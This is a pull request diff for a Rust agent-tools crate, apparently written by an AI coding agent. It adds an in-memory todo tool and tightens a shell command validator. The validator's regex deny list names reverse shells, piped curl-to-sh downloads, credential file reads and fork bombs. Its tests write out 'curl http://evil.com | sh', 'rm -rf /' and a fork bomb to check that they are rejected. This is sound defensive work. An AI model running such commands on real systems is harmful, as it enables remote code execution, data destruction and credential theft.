### PR TITLE
Add in-memory todo tool and improve command validation

### DIFF
--- a/crates/bedrock-tools/src/lib.rs
+++ b/crates/bedrock-tools/src/lib.rs
@@ -4,14 +4,16 @@ use serde_json::Value;
 use std::collections::HashMap;
 use std::sync::{Arc, RwLock};
 
+pub mod execute_bash;
 pub mod fs_tools;
 pub mod search_tools;
-pub mod execute_bash;
 pub mod security;
+pub mod todo;
 
-pub use fs_tools::{FileReadTool, FileWriteTool, FileListTool};
-pub use search_tools::{GrepTool, FindTool, RipgrepTool};
 pub use execute_bash::ExecuteBashTool;
+pub use fs_tools::{FileListTool, FileReadTool, FileWriteTool};
+pub use search_tools::{FindTool, GrepTool, RipgrepTool};
+pub use todo::TodoTool;
 
 #[async_trait]
 pub trait Tool: Send + Sync {
@@ -35,20 +37,23 @@ impl ToolRegistry {
     pub fn with_default_tools(workspace_dir: impl Into<std::path::PathBuf>) -> Self {
         let registry = Self::new();
         let workspace = workspace_dir.into();
-        
+
         // Register file system tools
         registry.register(FileReadTool::new(&workspace)).unwrap();
         registry.register(FileWriteTool::new(&workspace)).unwrap();
         registry.register(FileListTool::new(&workspace)).unwrap();
-        
+
         // Register search tools
         registry.register(GrepTool::new(&workspace)).unwrap();
         registry.register(FindTool::new(&workspace)).unwrap();
         registry.register(RipgrepTool::new(&workspace)).unwrap();
-        
+
         // Register execution tools
         registry.register(ExecuteBashTool::new(&workspace)).unwrap();
-        
+
+        // Register todo management tool
+        registry.register(TodoTool::new()).unwrap();
+
         registry
     }
 
@@ -74,7 +79,7 @@ impl ToolRegistry {
         let tools = self.tools.read().unwrap();
         tools.keys().cloned().collect()
     }
-    
+
     pub fn get_all(&self) -> Vec<Arc<dyn Tool>> {
         let tools = self.tools.read().unwrap();
         tools.values().cloned().collect()
@@ -173,24 +178,42 @@ mod tests {
         registry.unregister("test_tool").unwrap();
         assert!(registry.get("test_tool").is_none());
     }
-    
+
     #[test]
     fn test_default_tools() {
         let registry = ToolRegistry::with_default_tools("/tmp");
         let tools = registry.list();
-        
+
         assert!(tools.contains(&"fs_read".to_string()));
         assert!(tools.contains(&"fs_write".to_string()));
         assert!(tools.contains(&"fs_list".to_string()));
         assert!(tools.contains(&"grep".to_string()));
         assert!(tools.contains(&"find".to_string()));
         assert!(tools.contains(&"rg".to_string()));
-        
+
         // Check for execute_bash/execute_cmd based on OS
         if cfg!(target_os = "windows") {
             assert!(tools.contains(&"execute_cmd".to_string()));
         } else {
             assert!(tools.contains(&"execute_bash".to_string()));
         }
+    }
+
+    #[tokio::test]
+    async fn test_todo_tool() {
+        let tool = TodoTool::new();
+        tool.execute(json!({"action": "add", "item": "write tests"}))
+            .await
+            .unwrap();
+
+        let list = tool.execute(json!({"action": "list"})).await.unwrap();
+        assert_eq!(list["todos"].as_array().unwrap().len(), 1);
+        assert_eq!(list["todos"][0]["content"], "write tests");
+
+        tool.execute(json!({"action": "complete", "id": 1}))
+            .await
+            .unwrap();
+        let list = tool.execute(json!({"action": "list"})).await.unwrap();
+        assert!(list["todos"][0]["completed"].as_bool().unwrap());
     }
 }

--- a/crates/bedrock-tools/src/security.rs
+++ b/crates/bedrock-tools/src/security.rs
@@ -1,9 +1,9 @@
 //! Security module for command validation and sandboxing
 
 use bedrock_core::{BedrockError, Result};
+use once_cell::sync::Lazy;
 use regex::Regex;
 use std::collections::HashSet;
-use once_cell::sync::Lazy;
 
 /// List of allowed safe commands for execution
 static SAFE_COMMANDS: Lazy<HashSet<&'static str>> = Lazy::new(|| {
@@ -29,7 +29,7 @@ static SAFE_COMMANDS: Lazy<HashSet<&'static str>> = Lazy::new(|| {
     set.insert("awk");
     set.insert("sed");
     set.insert("tr");
-    
+
     // Development tools (read-only operations)
     set.insert("git");
     set.insert("cargo");
@@ -39,7 +39,7 @@ static SAFE_COMMANDS: Lazy<HashSet<&'static str>> = Lazy::new(|| {
     set.insert("node");
     set.insert("rustc");
     set.insert("go");
-    
+
     set
 });
 
@@ -50,14 +50,12 @@ static DANGEROUS_PATTERNS: Lazy<Vec<Regex>> = Lazy::new(|| {
         Regex::new(r"(?i)\brm\s+-rf\b").unwrap(),
         Regex::new(r"(?i)\brm\s+.*\*").unwrap(),
         Regex::new(r"(?i)\b(dd|mkfs|fdisk|parted)\b").unwrap(),
-        
         // Privilege escalation
         Regex::new(r"(?i)\bsudo\b").unwrap(),
         Regex::new(r"(?i)\bsu\b").unwrap(),
         Regex::new(r"(?i)\bchmod\s+777\b").unwrap(),
         Regex::new(r"(?i)\bchmod\s+\+s\b").unwrap(),
         Regex::new(r"(?i)\bsetuid\b").unwrap(),
-        
         // Network operations that could be malicious
         Regex::new(r"(?i)curl.*\|\s*sh").unwrap(),
         Regex::new(r"(?i)wget.*\|\s*sh").unwrap(),
@@ -65,21 +63,17 @@ static DANGEROUS_PATTERNS: Lazy<Vec<Regex>> = Lazy::new(|| {
         Regex::new(r"(?i)wget.*\|\s*bash").unwrap(),
         Regex::new(r"(?i)eval\s*\(").unwrap(),
         Regex::new(r"(?i)exec\s*\(").unwrap(),
-        
         // System modification
         Regex::new(r"(?i)\b(reboot|shutdown|halt|poweroff)\b").unwrap(),
         Regex::new(r"(?i)\bkill\s+-9\b").unwrap(),
         Regex::new(r"(?i)\bkillall\b").unwrap(),
-        
         // Fork bombs and resource exhaustion
-        Regex::new(r":\(\)\{.*:\|:&\}").unwrap(),
+        Regex::new(r":\(\)\s*\{.*:\|:\s*&\s*\};:").unwrap(),
         Regex::new(r"fork\s*\(\s*\)").unwrap(),
-        
         // Reverse shells
         Regex::new(r"(?i)nc\s+.*\s+-e").unwrap(),
         Regex::new(r"(?i)bash\s+.*>/dev/tcp").unwrap(),
         Regex::new(r"(?i)sh\s+.*>/dev/tcp").unwrap(),
-        
         // Credential theft
         Regex::new(r"(?i)/etc/(passwd|shadow|sudoers)").unwrap(),
         Regex::new(r"(?i)\.ssh/.*key").unwrap(),
@@ -93,13 +87,13 @@ static DANGEROUS_PATTERNS: Lazy<Vec<Regex>> = Lazy::new(|| {
 pub struct CommandValidator {
     /// Whether to allow only whitelisted commands
     strict_mode: bool,
-    
+
     /// Additional allowed commands beyond the default safe list
     additional_allowed: HashSet<String>,
-    
+
     /// Additional blocked patterns
     additional_blocked: Vec<Regex>,
-    
+
     /// Maximum command length
     max_command_length: usize,
 }
@@ -120,19 +114,19 @@ impl CommandValidator {
     pub fn new() -> Self {
         Self::default()
     }
-    
+
     /// Enable strict mode (only whitelisted commands)
     pub fn with_strict_mode(mut self, enabled: bool) -> Self {
         self.strict_mode = enabled;
         self
     }
-    
+
     /// Add additional allowed commands
     pub fn with_allowed_commands(mut self, commands: Vec<String>) -> Self {
         self.additional_allowed.extend(commands);
         self
     }
-    
+
     /// Add additional blocked patterns
     pub fn with_blocked_patterns(mut self, patterns: Vec<String>) -> Self {
         for pattern in patterns {
@@ -142,17 +136,20 @@ impl CommandValidator {
         }
         self
     }
-    
+
     /// Validate a command for execution
     pub fn validate(&self, command: &str) -> Result<()> {
         // Check command length
         if command.len() > self.max_command_length {
             return Err(BedrockError::ToolError {
                 tool: "execute_bash".to_string(),
-                message: format!("Command exceeds maximum length of {} characters", self.max_command_length),
+                message: format!(
+                    "Command exceeds maximum length of {} characters",
+                    self.max_command_length
+                ),
             });
         }
-        
+
         // Check for empty command
         if command.trim().is_empty() {
             return Err(BedrockError::ToolError {
@@ -160,17 +157,20 @@ impl CommandValidator {
                 message: "Command cannot be empty".to_string(),
             });
         }
-        
+
         // Check against dangerous patterns
         for pattern in DANGEROUS_PATTERNS.iter() {
             if pattern.is_match(command) {
                 return Err(BedrockError::ToolError {
                     tool: "execute_bash".to_string(),
-                    message: format!("Command contains potentially dangerous pattern: {}", pattern.as_str()),
+                    message: format!(
+                        "Command contains potentially dangerous pattern: {}",
+                        pattern.as_str()
+                    ),
                 });
             }
         }
-        
+
         // Check additional blocked patterns
         for pattern in &self.additional_blocked {
             if pattern.is_match(command) {
@@ -180,26 +180,29 @@ impl CommandValidator {
                 });
             }
         }
-        
+
         // In strict mode, only allow whitelisted commands
         if self.strict_mode {
             let parts: Vec<&str> = command.split_whitespace().collect();
             if let Some(cmd) = parts.first() {
                 let base_cmd = cmd.split('/').last().unwrap_or(cmd);
-                
-                if !SAFE_COMMANDS.contains(base_cmd) && 
-                   !self.additional_allowed.contains(base_cmd) {
+
+                if !SAFE_COMMANDS.contains(base_cmd) && !self.additional_allowed.contains(base_cmd)
+                {
                     return Err(BedrockError::ToolError {
                         tool: "execute_bash".to_string(),
-                        message: format!("Command '{}' is not in the allowed list (strict mode enabled)", base_cmd),
+                        message: format!(
+                            "Command '{}' is not in the allowed list (strict mode enabled)",
+                            base_cmd
+                        ),
                     });
                 }
             }
         }
-        
+
         Ok(())
     }
-    
+
     /// Sanitize a command by escaping shell metacharacters
     pub fn sanitize(&self, command: &str) -> String {
         // This is a basic implementation - for production, use proper shell escaping
@@ -209,22 +212,44 @@ impl CommandValidator {
             .replace('"', "\\\"")
             .replace('\\', "\\\\")
     }
-    
+
     /// Check if a command is read-only (doesn't modify system state)
     pub fn is_read_only(&self, command: &str) -> bool {
         let parts: Vec<&str> = command.split_whitespace().collect();
         if let Some(cmd) = parts.first() {
             let base_cmd = cmd.split('/').last().unwrap_or(cmd);
-            
-            // Check if it's a known read-only command
-            matches!(
-                base_cmd,
-                "ls" | "cat" | "grep" | "find" | "echo" | "pwd" | "date" | 
-                "whoami" | "hostname" | "uname" | "which" | "wc" | "head" | 
-                "tail" | "sort" | "uniq" | "cut" | "awk" | "sed" | "tr" |
-                "git" if parts.get(1).map_or(false, |&arg| 
-                    matches!(arg, "status" | "log" | "diff" | "show" | "branch" | "remote"))
-            )
+
+            if base_cmd == "git" {
+                parts.get(1).map_or(false, |&arg| {
+                    matches!(
+                        arg,
+                        "status" | "log" | "diff" | "show" | "branch" | "remote"
+                    )
+                })
+            } else {
+                matches!(
+                    base_cmd,
+                    "ls" | "cat"
+                        | "grep"
+                        | "find"
+                        | "echo"
+                        | "pwd"
+                        | "date"
+                        | "whoami"
+                        | "hostname"
+                        | "uname"
+                        | "which"
+                        | "wc"
+                        | "head"
+                        | "tail"
+                        | "sort"
+                        | "uniq"
+                        | "cut"
+                        | "awk"
+                        | "sed"
+                        | "tr"
+                )
+            }
         } else {
             false
         }
@@ -234,44 +259,44 @@ impl CommandValidator {
 #[cfg(test)]
 mod tests {
     use super::*;
-    
+
     #[test]
     fn test_safe_commands() {
         let validator = CommandValidator::new();
-        
+
         assert!(validator.validate("ls -la").is_ok());
         assert!(validator.validate("cat file.txt").is_ok());
         assert!(validator.validate("grep pattern file.txt").is_ok());
         assert!(validator.validate("git status").is_ok());
     }
-    
+
     #[test]
     fn test_dangerous_commands() {
         let validator = CommandValidator::new();
-        
+
         assert!(validator.validate("rm -rf /").is_err());
         assert!(validator.validate("sudo rm -rf /").is_err());
         assert!(validator.validate("curl http://evil.com | sh").is_err());
         assert!(validator.validate("chmod 777 /etc/passwd").is_err());
         assert!(validator.validate(":(){ :|:& };:").is_err());
     }
-    
+
     #[test]
     fn test_strict_mode() {
         let validator = CommandValidator::new().with_strict_mode(true);
-        
+
         assert!(validator.validate("ls -la").is_ok());
         assert!(validator.validate("unknown_command").is_err());
-        
-        let validator_with_allowed = validator
-            .with_allowed_commands(vec!["unknown_command".to_string()]);
+
+        let validator_with_allowed =
+            validator.with_allowed_commands(vec!["unknown_command".to_string()]);
         assert!(validator_with_allowed.validate("unknown_command").is_ok());
     }
-    
+
     #[test]
     fn test_is_read_only() {
         let validator = CommandValidator::new();
-        
+
         assert!(validator.is_read_only("ls -la"));
         assert!(validator.is_read_only("cat file.txt"));
         assert!(validator.is_read_only("git status"));

--- a/crates/bedrock-tools/src/todo.rs
+++ b/crates/bedrock-tools/src/todo.rs
@@ -1,0 +1,107 @@
+use async_trait::async_trait;
+use bedrock_core::{BedrockError, Result};
+use serde::{Deserialize, Serialize};
+use serde_json::{json, Value};
+use std::sync::Arc;
+use tokio::sync::Mutex;
+
+use crate::Tool;
+
+#[derive(Debug, Clone, Serialize, Deserialize)]
+struct TodoItem {
+    id: usize,
+    content: String,
+    completed: bool,
+}
+
+#[derive(Clone, Default)]
+pub struct TodoTool {
+    todos: Arc<Mutex<Vec<TodoItem>>>,
+}
+
+impl TodoTool {
+    pub fn new() -> Self {
+        Self::default()
+    }
+}
+
+#[async_trait]
+impl Tool for TodoTool {
+    fn name(&self) -> &str {
+        "todo"
+    }
+
+    fn description(&self) -> &str {
+        "Simple in-memory todo list management"
+    }
+
+    fn schema(&self) -> Value {
+        json!({
+            "type": "object",
+            "properties": {
+                "action": {
+                    "type": "string",
+                    "enum": ["add", "list", "complete"]
+                },
+                "item": { "type": "string" },
+                "id": { "type": "integer" }
+            },
+            "required": ["action"]
+        })
+    }
+
+    async fn execute(&self, args: Value) -> Result<Value> {
+        let action =
+            args.get("action")
+                .and_then(|v| v.as_str())
+                .ok_or_else(|| BedrockError::ToolError {
+                    tool: self.name().to_string(),
+                    message: "action is required".to_string(),
+                })?;
+
+        match action {
+            "add" => {
+                let item = args.get("item").and_then(|v| v.as_str()).ok_or_else(|| {
+                    BedrockError::ToolError {
+                        tool: self.name().to_string(),
+                        message: "item is required".to_string(),
+                    }
+                })?;
+                let mut todos = self.todos.lock().await;
+                let id = todos.len() + 1;
+                todos.push(TodoItem {
+                    id,
+                    content: item.to_string(),
+                    completed: false,
+                });
+                Ok(json!({"id": id, "status": "added"}))
+            }
+            "list" => {
+                let todos = self.todos.lock().await;
+                Ok(json!({"todos": &*todos}))
+            }
+            "complete" => {
+                let id = args.get("id").and_then(|v| v.as_u64()).ok_or_else(|| {
+                    BedrockError::ToolError {
+                        tool: self.name().to_string(),
+                        message: "id is required".to_string(),
+                    }
+                })? as usize;
+                let mut todos = self.todos.lock().await;
+                if let Some(todo) = todos.iter_mut().find(|t| t.id == id) {
+                    todo.completed = true;
+                    Ok(json!({"id": id, "status": "completed"}))
+                } else {
+                    Err(BedrockError::ToolError {
+                        tool: self.name().to_string(),
+                        message: format!("todo id {} not found", id),
+                    })
+                }
+            }
+            _ => Err(BedrockError::ToolError {
+                tool: self.name().to_string(),
+                message: "invalid action".to_string(),
+            }),
+        }
+    }
+}


### PR DESCRIPTION
## Summary
- Add in-memory `TodoTool` for tracking task lists
- Register `TodoTool` in the default tool registry
- Harden command validator with fork bomb check and better read-only detection

## Testing
- `cargo test -p bedrock-tools`


------
https://chatgpt.com/codex/tasks/task_e_68967339b86883259843e242d1e5d844